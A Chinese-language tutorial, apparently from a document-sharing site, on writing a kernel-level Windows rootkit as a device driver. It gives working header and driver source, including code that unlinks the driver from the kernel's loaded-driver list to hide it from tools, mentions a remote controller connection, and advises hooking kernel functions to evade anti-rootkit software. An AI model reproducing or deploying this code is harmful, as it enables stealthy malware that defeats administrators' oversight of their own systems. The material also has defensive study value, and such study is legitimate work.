当前位置:文档之家 › 内核级Rootkit 教程

内核级Rootkit 教程

  • 格式:doc
  • 大小:88.00 KB
  • 文档页数:18

下载文档原格式

  / 18

合集下载

SSDT内核钩子原理及检测程序的实现

SSDT内核钩子原理及检测程序的实现
kernel32! openprocess
ntdll! NtopenProcess
sysenter (int 2Eh)
ring3 ring0
nt! NtOpenProcess
图 1 OpenProcess 调用过程
3 SSDT 结构
Windows 可执行程序在内核模式中运行, 并且对操作系统 的 所 有 子 系 统 , 如 Win32、 POSIX 和 OS/2 都 提 供 本 地 支 持 。 这些本地系统服务的地址在内核结构中称为系统服务调度表 (System Service Dispatch Table, SSDT) 中列出 。 该表 可 以 基 于 系统调用编号进行索引, 以便定位函数的内存地址。 还有一 个 系 统 服 务 参 数 表 (System Service Parameter Table, SSPT) 指 定了每个系统服务的函数参数的字节数。 [1]
以 OpenProcess 函 数 为 例 , OpenProcess 函 数 的 定 义 位 于 kernel32.dll, 用 Windbg 来 打 开 kernel32.dll, 然 后 可 以 发 现 在 OpenProcess 中有类似这样的汇编代码:
call ds:NtOpenProcess 这 就 是 说 , OpenProcess 调 用 了 ntdll.dll 的 NtOpenProcess 函数。 NtOpenProcess 的代码如下: mov eax, 7Ah mov edx, 7FFE0300h call dword ptr [edx] retn 10h call dword ptr [edx] 的实质是调用了 KiFastSystemCall: mov edx, esp sysenter

系统安全漏洞与恶意代码介绍

系统安全漏洞与恶意代码介绍
变化 从传播范围来看,恶意代码呈现多平台传播的特

35
恶意代码分类
照恶意代码运行平台 按照恶意代码传播方式 按照恶意代码的工作机
制 按照恶意代码危害
罗伯特.莫里斯
1995年—首次发现macro virus
31
恶意代码发展
1996年—netcat的UNIX版发布(nc) 1998年—第一个Java virus(StrangeBrew) 1998年—netcat的Windows版发布(nc) 1998年—back orifice(BO)/CIH 1999年—melissa/worm(macrovirus by email) 1999年—back orifice(BO) for WIN2k 1999年—DOS/DDOS-Denial of Service TFT/
恶意代码的发展趋势?从传播速度上来看恶意代码爆发和传播速度越来越快?从攻击意图来看恶意代码的开发者越来越与业化其意图也从游戏炫耀与向为恶意牟利?从功能上来看恶意代码的分工越来越细?从实现技术来看恶意代码实现的关键技术丌断变化?从传播范围来看恶意代码呈现多平台传播的特征35恶意代码分类36?照恶意代码运行平台?按照恶意代码传播斱式?按照恶意代码的工作机制?按照恶意代码危害分类蠕虫病毒后门木马有害工具流氓软件风险程序其他恶意代码分类37?丌传染的依附型恶意代码?流氓软件逡辑炸弹恶意脚本?丌传染的独立型恶意代码?木马rootkit风险程序?传染的依附型恶意代码?传统的病毒cih等?传染的独立型恶意代码?蠕虫病毒?可以丌依附亍所谓的数组而独立存在
了解安全漏洞的静态与动态挖掘方法的基本原理 了解补丁分类及修复时应注意的问题
12
漏洞的发现
从人工发现阶段发展到了依靠自动分析工具辅助 的半自动化阶段

RootKit攻防和检测技术

RootKit攻防和检测技术

文献 标 识 码 : A
Hale Waihona Puke 文章 编 号 :0 9 3 4 (0 83 — 8 8 0 1 0 — 0 42 0 )1 0 3 — 2
De e c n tc i n Te h o o y Ag i s o Ki f n e a d De e to c n l g an t Ro t t
ZH AN G i Gn —qin n—ln a g , La LI a
fa z o to h mia Colg f ct nlTeh oo y L n h u7 0 6 , ia 2L n h uUnv ri , a z o 3 0 0 Chn) L n h uPerc e cl l eo ai a e Vo o c n lg , a z o 3 0 0 Chn ; .a zo iesy L n h u7 0 3 , ia t
l N 10— 04 SS 9 3 4 0
E mal i f@C C .e.n — i no C Cn t : e ht:w t / ww.n sn t n p/ d z. e. e T l 8 — 51 5 9 9 3 5 9 9 4 e: 6 5 6 0 6 6 0 6 + —
O 利 用 系统 驱 动 模 块 以驱 动 形 式 隐藏 木 马 程 序 , 就是 让 人 闻 之 色变 的 R o i 这 ot t k。
1什 么 是 Ro t i o kt
r g0层 的是 系统 核 心 模 块 和各 种 驱 动 程序 模 块 , i n 因此 , 于 这 一层 的木 马 也 是 以驱 动 形式 生 存 的 , 不 是 一 般 的 ee 位 而 x 。后 门作 者 把后 门写 成符 合 w m 规 范 ( i o sdi r o e) 驱 动 程序 模 块 , 自身 添加 进 注 册 表 的 驱 动 程序 加 载 入 口 , 实 现 了“ 启 动 d wn w r e d 1的 d v m 把 便 无 项 ” 行 。 般 的进 程查 看 器 都 只 能枚 举 可 执 行 文件 ee的信 息 , 以 通 过驱 动 模 块 和执 行 文 件 结合 的后 门 程序 便 得 以 生存 下 来 , 运 一 x 所 由 于 它 运 行在 r g i n 0级 别 , 有 与 系 统 核 心 同 等 级 的权 限 , 此 它 可 以更 轻 易 的把 自 己 隐藏 起 来 , 论 是 进 程 信 息 还 是 文 件体 , 至 拥 冈 无 甚 通 讯 的端 V和 流量 也 能 被 隐 藏起 来 , 如 此 强 大 的 隐藏 技 术 面 前 I 存 无论 是 任 务 管 理 器还 是 系统 配 置 实 用 程 序 , 至 系 统 自带 的注 册 甚 表 工 具 都失 去 了 效果 , 种木 马 就 是 R o i 这 ot t k 。所 以 , oti是 通 过 加 载 特殊 的驱 动 , 改 系统 内核 , 而达 到 隐藏 信 息 的 目的 。 R okt 修 进

基于虚拟机的Rootkit检测系统

基于虚拟机的Rootkit检测系统

基于虚拟机的Rootkit检测系统张文晓;戴航;黄东旭【期刊名称】《计算机技术与发展》【年(卷),期】2012(22)7【摘要】Kernel Rootkit runs in the highest system level,can modify all the data of system, so it causes great ducat to the security of computer system. At present,facing to the Rootkit,most of methods based on virtual machine focus on protection of kernel's integrity,and ignore to detect the technology of Rootkit. Based on virtual machine,propose a new method to automatically detect and son Rootkit This method is named VDR system,can detect Rootkit efficiently and tell the difference between kinds of Rootkit,moreover remember it for agenst the second attack. The VDR system can improve plentiful information for the system administrator.%内核级Rootkit位于操作系统核心层,可以篡改内核地址空间的任意数据,对系统安全构成了巨大的威胁.目前基于虚拟机的Rootkit方面应用大都偏重于完整性保护,未对Rootkit的攻击手段和方式进行检测识别.文中在虚拟机框架下,提出了一种新型的Rootkit检测系统VDR,VDR通过行为分析可有效识别Rootkit的攻击位置方式,并自我更新免疫该Rootkit的再次攻击.实验表明,VDR对已知Rootkit的检测和未知Rootkit的识别均有良好效果,能迅速给出攻击信息,为系统安全管理带来很大方便.【总页数】5页(P128-131,135)【作者】张文晓;戴航;黄东旭【作者单位】西北工业大学自动化学院,陕西西安710072;西北工业大学自动化学院,陕西西安710072;西北工业大学自动化学院,陕西西安710072【正文语种】中文【中图分类】TP319【相关文献】1.基于 Windows API 调用机制的 Rootkit检测系统的设计与研究 [J], 袁宇恒;黄耿星;龚征2.虚拟化环境下基于职能分离的Rootkit检测系统架构研究 [J], 朱智强;赵志远;孙磊;杨杰3.基于虚拟机架构的内核Rootkit防范方案 [J], 赵帅;武延军;贺也平4.基于OpenFlow的虚拟机流量检测系统的设计与实现 [J], 邵国林;陈兴蜀;尹学渊;张峰伟5.一种基于差异分析的rootkit检测系统 [J], 胡晓嵩;王剑因版权原因,仅展示原文概要,查看原文内容请购买。

Windows内核级防护系统

Windows内核级防护系统

Windows内核级防护系统孟晨宇;史渊;王佳伟;周洁;康晓凤【摘要】Windows操作系统是当今应用最广泛的个人计算机操作系统,针对这一操作系统的病毒和木马层出不穷.大多数杀毒软件主要依赖特征码识别技术、校验和技术、软件模拟技术检测病毒.本系统从手动杀毒角度出发,变被动防御为主动查杀,特别是Rootkit保护的内核级木马,通过检测相应的被挂钩函数,内核中被修改的地址,找到相应的进程,从而实现了木马进程的强杀、相应内核内容的恢复等功能,更有效的保护计算机操作系统的安全.【期刊名称】《软件》【年(卷),期】2016(037)003【总页数】6页(P16-20,26)【关键词】内核防护;手动杀毒;信息安全;Rootkit【作者】孟晨宇;史渊;王佳伟;周洁;康晓凤【作者单位】徐州工程学院信电工程学院,江苏徐州221000);徐州工程学院信电工程学院,江苏徐州221000);徐州工程学院信电工程学院,江苏徐州221000);徐州工程学院信电工程学院,江苏徐州221000);徐州工程学院信电工程学院,江苏徐州221000)【正文语种】中文【中图分类】TP311本文著录格式:孟晨宇,史渊,王佳伟,等. Windows内核级防护系统[J]. 软件,2016,37(3):16-20随着网络技术的发展,计算机在人民生活中的地位越来越重要。

计算机在给人民的生活和工作带来极大便利的同时,也带来了信息安全问题。

Windows操作系统是当今应用最广泛的个人计算机操作系统,针对这一操作系统的病毒和木马层出不穷。

[1]而且更为严重的是内核级Rootkit的诞生,给系统安全带来了极大的破坏性。

内核是操作系统的核心,内核的完整性保护对维护操作系统至关重要。

[2]所以本系统旨在从内核出发,全方位的利用多种综合检测技术维护系统内核的安全性以及完整性。

1.1 系统整体设计方案本系统主要分为用户层和内核层,[3]用户层利用VC++ 6.0开发,采用C++语言实现,[3-5]内核层利用WDK开发,采用C语言实现。

冰刃使用教程

冰刃使用教程

冰刃使用教程一.什么是冰刃一款软件,它专为查探系统中的幕后黑手——木马和后门而设计,内部功能强大,它使用了大量新颖的内核技术,使内核级的后门一样躲无所躲。

二.冰刃的特点所使用技术新颖、小巧、功能强大。

三.冰刃的功能他可对以下功能点进行查看和对部分进行操作:进程1.欲察看当前进程,请点击“进程”按钮,在右部列出的进程中,隐藏的进程会以红色醒目地标记出,以方便查找隐藏自身的系统级后门。

2.右键菜单:1)刷新列表:请再次点击“进程”按钮,或点击右键,选择“刷新列表”。

2)结束进程:点击左键选中一项,或按住Ctrl键选择多项,然后使用右键菜单的“结束进程”将它们结束掉。

3)线程信息:在右键菜单中选择“线程信息”,出现如下对话框:4)模块信息:在右键菜单中选择“模块信息”,出现如下对话框:“卸除”对于系统DLL是无效的,你可以使用“强制解除”,不过强制解除系统DLL必然会使进程挂掉。

强制解除后在使用PEB来查询模块的工具中仍可看到被解除的DLL,而实际上DLL已经被卸掉了。

5)内存读写:在右键菜单中选择“内存读写”,出现如下对话框:操作时首先填入读的起始地址和长度,点击“读内存”,如果该进程内的指定地址有效,则读取并显示,您可以在编辑框中修改后点击“写内存”写入选中的进程。

注意此刻的提示框会建议您选“否”即不破除COW机制,在您不十分明白COW之前,请选择“否”,否则可能写入错误的地址给系统带来错误以至崩溃。

读出内容后,可以点击“反汇编”查看反汇编值,某些木马修改函数入口来hook 函数,可由反汇编值分析判断。

●端口此栏的功能是进程端口关联。

它的前四项与netstat -an类似,后两项是打开该端口的进程。

●内核模块即当前系统加载的核心模块比如驱动程序。

●启动组●服务用于查看系统中的被隐藏的或未隐藏的服务,隐藏的服务以红色显示●SPI列举出系统中的网络服务提供者,因为它有可能被用来做无进程木马。

●BHO浏览器辅助对象查看。

浅析Windows系统调用——2种切换到内核模式的方法

shayi1983end 2015-11-08 23:55:16浅析Windows 系统调用——2种切换到内核模式的方法首先总结2种切换到内核模式方法的各自流程,以 Windows API WriteFile() 调用为例:内存法(中断法):(用户模式)WriteFile() -> ntdll!NtWriteFile() -> ntdll!KiIntSystemCall() -> int 2E h -> 查找 IDT (中断描述符表)的内存地址,偏移0x2E处 ->(内核模式)nt!KiSyste mService() -> nt!KiFastCallEntry() -> nt!NtWriteFile()通过 0x2E 中断转移控制到内核模式后,系统服务分发/调度器为 nt!KiFastCallEntry(),它负责调用内核空间中的同名异前缀函数 nt!NtWriteFile(),后者有一个系统服务号;也叫做分发 ID,该 ID 需要在执行 int 2Eh 前,加载到EAX 寄存器,以便通知 nt! KiSystemService() 要它分发的系统调用(本机API),但是最终还是经由 nt!KiFastCa llEntry() 来分发粗略地讲,INT 指令在内部涉及如下几个操作:1。

清空陷阱标志(TF),和中断允许标志(IF);2。

依序把(E)FLAGS,CS,(E)IP 寄存器中的值压入栈上;3。

转移到 IDT 中的中断门描述符记载的相应 ISR(中断服务例程)的起始地址;4。

执行 ISR,直至遇到 IRET 返回。

最关键的第3步涉及“段间”转移,通过中断门描述符,能够引用一个 Ring0 权限代码段,该代码段对应的 64 位段描述符(存储在 GDT 中)中的 DPL 位,即特权级位等于0(0=Ring 0;3=Ring3,即便由 Intel 规定的段描述符的 DPL 位有4种取值,但 Windows 仅使用了其中的最高特权级 Ring0 与最低特权级 Ring3,总体而言,用户模式应用程序位于 Ring3 代码或数据段;内核与设备驱动程序则位于 Ring0 代码或数据段 ),再结合段描述符中的“基址”与中断门描述符中的“偏移”,就能计算出 ISR 在 Ring0 代码段中的起始地址。

DLL 劫持技术(内存补丁技术)

// 释放原始模块 inline VOID WINAPI Free() { if (m_hModule) FreeLibrary(m_hModule); } // 获取原始函数地址 FARPROC WINAPI GetAddress(PCSTR pszProcName) {
d FARPROC fpAddress; e TCHAR szProcName[16]={0}; r TCHAR tzTemp[MAX_PATH]={0}; te if (m_hModule == NULL) is {
00401496 EB 29 jmp short 004014C1
补丁编程实现就是: 代码:
unsigned char p401496[2] = {0xEB, 0x29}; WriteProcessMemory(hProcess,(LPVOID)0x401496, p401496, 2, NULL);
Printed with FinePrint - purchase at
丁任务。伪造的 ws2_32.dll 有着真实 ws2_32.dll 一样的输出函数,完整源码见光盘。实现时,可以利用 DLL 模块中的函数转发器来实现这个目标,其会将对一个函数的调用转至另一个 DLL 中的另一个函数。可 以这样使用一个 pragma 指令: 代码:
tered 利用这种方法取得控制权后,可以对主程序进行补丁。此种方法只对除 kernel32.dll, ntdll.dll 等核心 is 系统库以外的 DLL 有效,如网络应用程序的 ws2_32.dll,游戏程序中的 d3d8.dll,还有大部分应用程序
都调用的 lpk.dll,这些 DLL 都可被劫持。
Printed with FinePrint - purchase at

永久型Windows Rootkit检测技术

维普资讯
第3 4卷 第 1 期 8
V1 4 o. 3






20 0 8年 9月
Se t m be 0 pe r2 08
No J .8
Co p t rEn i e rn m u e gn e i g
软件技术与数据库 ・
 ̄ m 1 0 3 8o )- 0 _ 2 文 标 码; i q" o _ 4 (o 1 _ 7_ o .22 88o 0 0 _ 献 识 A
(. l g f o ue, i j iesy Tajn 0 0 2 1Col eo mp trTa i Unvri , ini 0 7 ; e C nn t 3 2 C l g f o ue, e igUnvri f eh oo y B in 0 0 2 . ol e C mp tr B in iesyo T cn lg , e ig10 2 ) e o j t j [ sr clB c ueo emae t tr ga dhdn t drS oe, es tn o tibc me eyi ot tsu f o ue eui . Abtat ea s f r n nl s i n iigi r e’cd s prie t okt e o s vr p y on nu s R a mp r n seo mp t sc ry a i c r t
系统过滤驱动与钩挂系统服 务分析系统行为 ,判定系统是否 已被装入永久型 Wid wsR okt n o o ti,并完成对 经典 Ro tthc e eed r ok —akrdfne 及它 i 所保护的恶意程序 的检测 。由于 该检测技术使 用底层驱动 监测 ,不依 赖特征码 ,因此对 内核级 和将来 出现 的 Ro ti okt具有 良好 的检测

铲除潜伏在系统中的rootkit病毒


RootKit 病毒的特点及类别
从以上的排查实例可以 看 出,该 服 务 器 实 际 遭 遇 了 文件级别的 RootKit 病毒的 袭扰。
对 于 Linux 来 说, Rootkit 级别的病毒是比较 难 以 对 付 的。RootKit 病 毒 的最大特点是可以通过替 换 系 统 文 件 的 方 式,来 达 到 攻击系统和和隐蔽自身的目 的。 使 用 一 般 的 防 御 手 段, 是难以清查这些病毒的。
Web 服务,可实际上该机根本 件 都 是 些 冒 牌 货。 执 行 有忽隐忽现的情况,经过检
没 有 安 装 任 何 Web 服 务,而 “crontab -l”命令,在列表 测发现“/usr/bin/nshbsdy”
且其名称有些欲盖弥彰。
中 没 有 发 现 可 疑 的 定 时 任 是一个目录,进入该目录,执
Security 信息安全
责任编辑:赵志远 投稿信箱:netadmin@
铲除潜伏在系统中的 Rootkit 病毒
■ 河南 许红军
编者按 :某单位的一台数据库服务器和外界的通讯流量突然变得很高,占用了大量的网络带 宽,实际上该服务器只是用来存储数据,根本无需连接 Internet 上的其他主机,这说明该机已 被植入了后门程序,并被恶意控制。因为其上安装有 OpenSSH 服务,可以进行远程连接。但是 连接的速度很慢,显然其带宽被恶意占用。
bin/libudev”命 令,将 后 门 令无法使用,解决方法是从
程 序 删 除。 按 照 同 样 的 方 其他主机上复制这些的命令
法,将所有的病毒全部删除。 文件到本机对应路径即可。
之 后 运 行“top”命 令,找 到
根据上述情况分析,该机
“apachel”等 非 法 进 程 的 安装了 Oracle 数据库,用户
  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

内核级Rootkit 教程一、综述本文将引领读者打造一个初级的内核级Rootkit,然后为其引入两种简单的隐形技术:进程隐形技术和文件隐形技术。

同时,为了让读者获得rootkit编程的相关经验,我们顺便介绍了rootkit的装载、卸载方法,以及必不可少的测试技术。

本文介绍的Rootkit的主要构件是一个设备驱动程序,所以我们首先了解一下我们的第一个rootkit。

二、rootkit主体本节引入一个简单的rootkit实例,它实际上只给出了rootkit的主体框架,换句话说,就是一个设备驱动程序。

那么为什么要用设备驱动程序作为主体呢?很明显,因为在系统中,设备驱动程序和操作系统一样,都是程序中的特权阶级——它们运行于Ring0,有权访问系统中的所有代码和数据。

还有一点需要说明的是,因为本例主要目的在于介绍rootkit是如何隐形的,所以并没有实现后门之类的具体功能,。

我们将以源代码的形式说明rootkit,对着重介绍一些重要的数据结构和函数。

下面,先给出我们用到的第一个文件,它是一个头文件,名为Invisible.h,具体如下所示://Invisible.h:我们rootkit的头文件#ifndef _INVISIBLE_H_#define _INVISIBLE_H_typedef BOOLEAN BOOL;typedef unsigned long DWORD;typedef DWORD* PDWORD;typedef unsigned long ULONG;typedef unsigned short WORD;typedef unsigned char BYTE;typedef struct _DRIVER_DATA{LIST_ENTRY listEntry;DWORD unknown1;DWORD unknown2;DWORD unknown3;DWORD unknown4;DWORD unknown5;DWORD unknown6;DWORD unknown7;UNICODE_STRING path;UNICODE_STRING name;} DRIVER_DATA;#endif我们知道,应用软件只要简单引用几个文件如stdio.h和windows.h,就能囊括大量的定义。

但这种做法到了驱动程序这里就行不通了,原因大致有二条,一是驱动程序体积一般较为紧凑,二是驱动程序用途较为专一,用到的数据类型较少。

因此,我们这里给出了一个头文件Invisible.h,其中定义了一些供我们的rootkit之用的数据类型。

这里定义的类型中,有一个数据类型要提一下:双字类型,它实际上是一个无符号长整型。

此外,DRIVER_DATA是Windows 操作系统未公开的一个数据结构,其中含有分别指向设备驱动程序目录中上一个和下一个设备驱动程序的指针。

而我们这里开发的rootkit恰好就是作为设备驱动程序来实现,所以,只要从设备驱动程序目录中将我们的rootkit(即驱动程序)所对应的目录项去掉,系统管理程序就看不到它了,从而实现了隐形。

上面介绍了rootkit的头文件,现在开始介绍rootkit的主体部分,它实际就是一个基本的设备驱动程序,具体代码如下面的Invisible.c所示:// Invisible#include "ntddk.h"#include "Invisible.h"#include "fileManager.h"#include "configManager.h"// 全局变量ULONG majorVersion;ULONG minorVersion;//当进行free build时,将其注释掉,以防被检测到VOID OnUnload( IN PDRIVER_OBJECT pDriverObject ){DbgPrint("comint16: OnUnload called.");}NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRINGtheRegistryPath ){DRIVER_DATA* driverData;//取得操作系统的版本PsGetVersion( &majorVersion, &minorVersion, NULL, NULL );// Major = 4: Windows NT 4.0, Windows Me, Windows 98 或 Windows 95// Major = 5: Windows Server 2003, Windows XP 或 Windows 2000// Minor = 0: Windows 2000, Windows NT 4.0 或 Windows 95// Minor = 1: Windows XP// Minor = 2: Windows Server 2003if ( majorVersion == 5 && minorVersion == 2 ){DbgPrint("comint16: Running on Windows 2003");}else if ( majorVersion == 5 && minorVersion == 1 ){DbgPrint("comint16: Running on Windows XP");}else if ( majorVersion == 5 && minorVersion == 0 ){DbgPrint("comint16: Running on Windows 2000");}else if ( majorVersion == 4 && minorVersion == 0 ){DbgPrint("comint16: Running on Windows NT 4.0");}else{DbgPrint("comint16: Running on unknown system");}// 隐藏该驱动程序driverData = *((DRIVER_DATA**)((DWORD)pDriverObject + 20));if( driverData != NULL ){// 将本驱动程序的相应目录项从项驱动程序目录中拆下来*((PDWORD)driverData->listEntry.Blink) = (DWORD)driverData->listEntry.Flink; driverData->listEntry.Flink->Blink = driverData->listEntry.Blink;}// 允许卸载本驱动程序pDriverObject->DriverUnload = OnUnload;// 为本Rootkit的控制器配置连接if( !NT_SUCCESS( Configure() ) ){DbgPrint("comint16: Could not configure remote connection.\n");return STATUS_UNSUCCESSFUL;}return STATUS_SUCCESS;}Invisible.c是该rootkit的主体结构,其中包括入口函数DriverEntry和卸载函数OnUnload。

操作系统加载该驱动程序时将调用入口函数。

我们看到,在传递给入口函数的参数中有一个是DRIVER_OBJECT,它的作用是给出跟该驱动程序通信时所调用的函数的映射表。

就本例而言,我们仅仅映射了一个函数pDriverObject-〉DriverUnload,这样以来,当卸载驱动程序时,操作系统调用onunload函数就可行了。

需要特别说明的是,这一点在rootkit开发过程中特别实用,不用重启系统就可以卸载驱动程序,但是它却带来了一个大问题:容易被发现,所以在隐蔽性要求较高时不能使用,我们已经在源代码的相应部分给出了注释。

下面我们看一下该rootkit如何实现隐形。

我们将隐藏设备驱动程序的代码摘录如下:// 隐藏该驱动程序driverData = *((DRIVER_DATA**)((DWORD)pDriverObject + 20));if( driverData != NULL ){// 将本驱动程序的相应目录项从项驱动程序目录中拆下来*((PDWORD)driverData->listEntry.Blink) = (DWORD)driverData->listEntry.Flink;driverData->listEntry.Flink->Blink = driverData->listEntry.Blink;}为了达到不让操作系统找到我们的rootkit设备驱动程序的目的,这段代码修改了系统内核中的一个内部数据结构。

系统中有一个双向链表,专门记录当前运行着的驱动程序,也就是说每个运行的驱动程序在该链表中都有一个对应的表项。

像driv ers.exe之类的应用程序,正是通过该链表来获取设备驱动程序信息的,换句话说,如果从该链表中摘除本rootkit对应的表项,就能隐藏该rootkit的存在,从而躲过大多数的检测。

具体如下图所示:javascript:if(this.width>500)this.width=500" bor der=0>图1 修改前的驱动程序链表javascript:if(this.width>500)this.width=500" bor der=0>图2 修改后的驱动程序链表细心的读者也许会问:能藏起来固然是好,不过系统若仅通过该链表来感知驱动程序的存在的话,我们的这样做岂不是自己把rootkit给干掉了?!的幸运的是,Windows操作系统的内核使用另一个表来给各运行中的驱动程序分配时间,所以,即使从设备驱动程序列表清除rootkit相应的表项,我们的rootkit也照样活得很自在。

利用该技术隐匿rootkit时,必须注意一点:如果已在我们的rootkit之前安装了anti-rootkit软件,“清除一个设备驱动程序表项”这一行为本身有可能被发觉,从而引起人们的注意。

读者会问:这该怎么办呢?答案是,先记下本rootkit所对应的设备驱动程序表项的地址,然后钩住钩住检查设备驱动程序链表的内核函数,当这个函数要检查该链表时,我们就有机会提前把保存的表项放回到设备驱动程序链表。